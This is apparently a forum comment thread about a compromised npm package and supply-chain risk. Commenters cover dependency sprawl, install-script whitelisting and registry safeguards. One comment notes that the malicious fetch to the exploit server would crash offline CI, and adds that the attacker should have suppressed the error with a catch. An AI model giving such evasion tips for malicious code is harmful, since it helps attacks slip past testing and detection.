Many packages will have over a 100 dependencies if you include the dev dependencies, so you can easily break a 1000.
They were thinking to be the cool kids supporting multiple versions and that the old way to do packaging, like debian and co that expects everyone to use the same version, was the old legacy fart way to do things.
Just, developers before were engineers first and so designed things well especially to avoid this situation of dependency hell and supply chain injection. But the web dev crowd decided to do "better" and now to have old problems as new problems...
Smart developers spend their time working on original code rather than rewriting the wheel.
i noticed bun doesn't run them by default unless you whitelist them
Interestingly if this is happening in a long running process and that exploit server is offline, the promise for the fetch will reject. And the default behavior for unhandled promise rejections would be for the node process to crash.
So if anybody tried testing this version of the library in a net gapped environment, it would crash and fail out in CI.
The attacker should have silenced the error with a .catch(_ => {}).
Honestly it's time for the npm ecosystem to move to a model where only build agents running on npm's own infrastructure can upload binary artifacts, or to mandate reproducible builds.
And for a select set of highly used packages, someone from NPM should be paid to look over each release's changeset.
Both would have massively impeded the attacker.
It will be interesting t explore how the project got compromised and malicious packages published to the registry.
MichealCodes•2mo ago
nailer•2mo ago